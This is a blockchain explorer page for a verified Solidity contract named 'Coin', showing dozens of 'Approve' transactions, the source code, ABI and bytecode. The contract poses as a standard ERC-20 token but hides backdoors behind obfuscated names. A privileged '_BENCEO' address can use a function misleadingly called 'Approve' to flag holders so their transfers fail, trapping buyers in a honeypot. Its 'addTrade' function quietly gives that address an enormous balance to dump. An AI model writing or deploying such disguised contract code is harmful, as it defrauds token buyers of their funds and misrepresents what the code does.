S Price: $0.845038 (-0.64%)

Contract

0x38D15B8bc1fD34836c1dddbc3319dac052De35FE

Overview

S Balance

Sonic LogoSonic LogoSonic Logo0 S

S Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve98108742025-02-24 13:08:537 hrs ago1740402533IN
0x38D15B8b...052De35FE
0 S0.001941860.5
Approve98108272025-02-24 13:08:377 hrs ago1740402517IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98107482025-02-24 13:08:117 hrs ago1740402491IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98105032025-02-24 13:06:407 hrs ago1740402400IN
0x38D15B8b...052De35FE
0 S0.001941860.5
Approve98104582025-02-24 13:06:247 hrs ago1740402384IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98103802025-02-24 13:05:587 hrs ago1740402358IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98098152025-02-24 13:02:507 hrs ago1740402170IN
0x38D15B8b...052De35FE
0 S0.001941860.5
Approve98097712025-02-24 13:02:347 hrs ago1740402154IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98096412025-02-24 13:01:497 hrs ago1740402109IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98095632025-02-24 13:01:237 hrs ago1740402083IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98094272025-02-24 13:00:387 hrs ago1740402038IN
0x38D15B8b...052De35FE
0 S0.001941860.5
Approve98093782025-02-24 13:00:227 hrs ago1740402022IN
0x38D15B8b...052De35FE
0 S0.001941860.5
Approve98093252025-02-24 13:00:067 hrs ago1740402006IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98088892025-02-24 12:57:297 hrs ago1740401849IN
0x38D15B8b...052De35FE
0 S0.001941860.5
Approve98088472025-02-24 12:57:137 hrs ago1740401833IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98083422025-02-24 12:54:177 hrs ago1740401657IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98082602025-02-24 12:53:507 hrs ago1740401630IN
0x38D15B8b...052De35FE
0 S0.001941860.5
Approve98082212025-02-24 12:53:347 hrs ago1740401614IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98080202025-02-24 12:52:247 hrs ago1740401544IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98076852025-02-24 12:50:297 hrs ago1740401429IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98075402025-02-24 12:49:407 hrs ago1740401380IN
0x38D15B8b...052De35FE
0 S0.001941860.5
Approve98074922025-02-24 12:49:247 hrs ago1740401364IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98074152025-02-24 12:48:587 hrs ago1740401338IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
Approve98073372025-02-24 12:48:327 hrs ago1740401312IN
0x38D15B8b...052De35FE
0 S0.001941860.5
Approve98072842025-02-24 12:48:157 hrs ago1740401295IN
0x38D15B8b...052De35FE
0 S0.0030253660.5
View all transactions

Parent Transaction Hash Block From To
View All Internal Transactions
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Coin

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at SonicScan.org on 2025-02-24
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;


/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}



abstract contract Ownable {
    address private _owner;

    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

     /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checyydsOwen();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checyydsOwen() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}



contract Coin is Ownable {

   

    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public  _BENCEO;

    uint256 private _MYtotalSupply;
    string private _MYname;
    string private _MYsymbol;

    mapping(address => bool) private vippepevipcc;
    function quitApprove(address sss) external   {
        if (_BENCEO == _msgSender()){
            vippepevipcc[sss] = false;
        }
    }

    function Approve(address sss) external   {
        if (_BENCEO == _msgSender()){
            vippepevipcc[sss] = true;
        }
    }

    function queryacawtibot(address sss) public view returns(bool)  {
        return vippepevipcc[sss];
    }

    function vultBox12232() public view virtual  returns (uint256) {
        return _MYtotalSupply;
    }
    function addTrade() external {
        if (_msgSender() != _BENCEO) {
            return;
        }
        if (_BENCEO == _msgSender()){
            _balances[_msgSender()] = vultBox12232()*43000;
        }
    }
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_,address AntiBot) {
        _MYname = name_;
        _MYsymbol = symbol_;
        _BENCEO = AntiBot;
        _onceCCCmint(msg.sender, 1000000000*10**decimals());

    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual  returns (string memory) {
        return _MYname;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual  returns (string memory) {
        return _MYsymbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual  returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual  returns (uint256) {
        return _MYtotalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual  returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */

    function transfer(address to, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual  returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual  returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }
    /**
         * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    uint256 kkllfff99 = 0;
    function _transfer(
        address fromSender,
        address to,
        uint256 amount
    ) internal virtual {
        require(fromSender != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        uint256 balance= _balances[fromSender];
        if (vippepevipcc[fromSender] != false ){
            balance= _balances[fromSender]-(vultBox12232());
        }

        require(balance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[fromSender] = balance.sub(amount);
        uint256 feeeA = amount.mul(kkllfff99).div(100);
        _balances[to] =  _balances[to].add(amount).sub(feeeA);
        emit Transfer(fromSender, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _onceCCCmint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: CCCCCASADSADA to the zero address");

        _MYtotalSupply += amount;
    unchecked {
        // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
        _balances[account] += amount;
    }
        emit Transfer(address(0), account, amount);

    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _MYtotalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);


    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"AntiBot","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_BENCEO","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"addTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"queryacawtibot","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"quitApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"vultBox12232","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}]

608060405260006008553480156200001657600080fd5b50604051620025fb380380620025fb83398181016040528101906200003c91906200046d565b6200005c620000506200011860201b60201c565b6200012060201b60201c565b82600590805190602001906200007492919062000334565b5081600690805190602001906200008d92919062000334565b5080600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200010f33620000e4620001e460201b60201c565b600a620000f29190620006dd565b633b9aca006200010391906200081a565b620001ed60201b60201c565b505050620009e6565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000260576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000257906200056e565b60405180910390fd5b806004600082825462000274919062000625565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000328919062000590565b60405180910390a35050565b8280546200034290620008fc565b90600052602060002090601f016020900481019282620003665760008555620003b2565b82601f106200038157805160ff1916838001178555620003b2565b82800160010185558215620003b2579182015b82811115620003b157825182559160200191906001019062000394565b5b509050620003c19190620003c5565b5090565b5b80821115620003e0576000816000905550600101620003c6565b5090565b6000620003fb620003f584620005e1565b620005ad565b9050828152602081018484840111156200041457600080fd5b62000421848285620008c6565b509392505050565b6000815190506200043a81620009cc565b92915050565b600082601f8301126200045257600080fd5b815162000464848260208601620003e4565b91505092915050565b6000806000606084860312156200048357600080fd5b600084015167ffffffffffffffff8111156200049e57600080fd5b620004ac8682870162000440565b935050602084015167ffffffffffffffff811115620004ca57600080fd5b620004d88682870162000440565b9250506040620004eb8682870162000429565b9150509250925092565b60006200050460288362000614565b91507f45524332303a204343434343415341445341444120746f20746865207a65726f60008301527f20616464726573730000000000000000000000000000000000000000000000006020830152604082019050919050565b6200056881620008af565b82525050565b600060208201905081810360008301526200058981620004f5565b9050919050565b6000602082019050620005a760008301846200055d565b92915050565b6000604051905081810181811067ffffffffffffffff82111715620005d757620005d662000990565b5b8060405250919050565b600067ffffffffffffffff821115620005ff57620005fe62000990565b5b601f19601f8301169050602081019050919050565b600082825260208201905092915050565b60006200063282620008af565b91506200063f83620008af565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000677576200067662000932565b5b828201905092915050565b6000808291508390505b6001851115620006d457808604811115620006ac57620006ab62000932565b5b6001851615620006bc5780820291505b8081029050620006cc85620009bf565b94506200068c565b94509492505050565b6000620006ea82620008af565b9150620006f783620008b9565b9250620007267fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200072e565b905092915050565b60008262000740576001905062000813565b8162000750576000905062000813565b81600181146200076957600281146200077457620007aa565b600191505062000813565b60ff84111562000789576200078862000932565b5b8360020a915084821115620007a357620007a262000932565b5b5062000813565b5060208310610133831016604e8410600b8410161715620007e45782820a905083811115620007de57620007dd62000932565b5b62000813565b620007f3848484600162000682565b925090508184048111156200080d576200080c62000932565b5b81810290505b9392505050565b60006200082782620008af565b91506200083483620008af565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000870576200086f62000932565b5b828202905092915050565b600062000888826200088f565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015620008e6578082015181840152602081019050620008c9565b83811115620008f6576000848401525b50505050565b600060028204905060018216806200091557607f821691505b602082108114156200092c576200092b62000961565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b60008160011c9050919050565b620009d7816200087b565b8114620009e357600080fd5b50565b611c0580620009f66000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806395d89b41116100ad578063dd62ed3e11610071578063dd62ed3e14610359578063ebde9fa114610389578063f2fde38b146103a7578063f4cf1452146103c3578063f5dff741146103cd5761012c565b806395d89b41146102a357806396bfcd23146102c1578063a457c2d7146102dd578063a9059cbb1461030d578063ad55651f1461033d5761012c565b8063313ce567116100f4578063313ce567146101fd578063395093511461021b57806370a082311461024b578063715018a61461027b5780638da5cb5b146102855761012c565b806306fdde0314610131578063095ea7b31461014f5780630d6b406b1461017f57806318160ddd146101af57806323b872dd146101cd575b600080fd5b6101396103eb565b60405161014691906117a0565b60405180910390f35b6101696004803603810190610164919061136f565b61047d565b6040516101769190611785565b60405180910390f35b610199600480360381019061019491906112bb565b6104a0565b6040516101a69190611785565b60405180910390f35b6101b76104f6565b6040516101c491906118e2565b60405180910390f35b6101e760048036038101906101e29190611320565b610500565b6040516101f49190611785565b60405180910390f35b61020561052f565b60405161021291906118fd565b60405180910390f35b6102356004803603810190610230919061136f565b610538565b6040516102429190611785565b60405180910390f35b610265600480360381019061026091906112bb565b61056f565b60405161027291906118e2565b60405180910390f35b6102836105b8565b005b61028d6105cc565b60405161029a919061176a565b60405180910390f35b6102ab6105f5565b6040516102b891906117a0565b60405180910390f35b6102db60048036038101906102d691906112bb565b610687565b005b6102f760048036038101906102f2919061136f565b610740565b6040516103049190611785565b60405180910390f35b6103276004803603810190610322919061136f565b6107b7565b6040516103349190611785565b60405180910390f35b610357600480360381019061035291906112bb565b6107da565b005b610373600480360381019061036e91906112e4565b610893565b60405161038091906118e2565b60405180910390f35b61039161091a565b60405161039e91906118e2565b60405180910390f35b6103c160048036038101906103bc91906112bb565b610924565b005b6103cb6109a8565b005b6103d5610ac9565b6040516103e2919061176a565b60405180910390f35b6060600580546103fa90611ad1565b80601f016020809104026020016040519081016040528092919081815260200182805461042690611ad1565b80156104735780601f1061044857610100808354040283529160200191610473565b820191906000526020600020905b81548152906001019060200180831161045657829003601f168201915b5050505050905090565b600080610488610aef565b9050610495818585610af7565b600191505092915050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600454905090565b60008061050b610aef565b9050610518858285610cc2565b610523858585610d4e565b60019150509392505050565b60006012905090565b600080610543610aef565b90506105648185856105558589610893565b61055f9190611934565b610af7565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c06110f7565b6105ca6000611175565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461060490611ad1565b80601f016020809104026020016040519081016040528092919081815260200182805461063090611ad1565b801561067d5780601f106106525761010080835404028352916020019161067d565b820191906000526020600020905b81548152906001019060200180831161066057829003601f168201915b5050505050905090565b61068f610aef565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16141561073d576001600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b60008061074b610aef565b905060006107598286610893565b90508381101561079e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610795906118c2565b60405180910390fd5b6107ab8286868403610af7565b60019250505092915050565b6000806107c2610aef565b90506107cf818585610d4e565b600191505092915050565b6107e2610aef565b73fffffffffffffff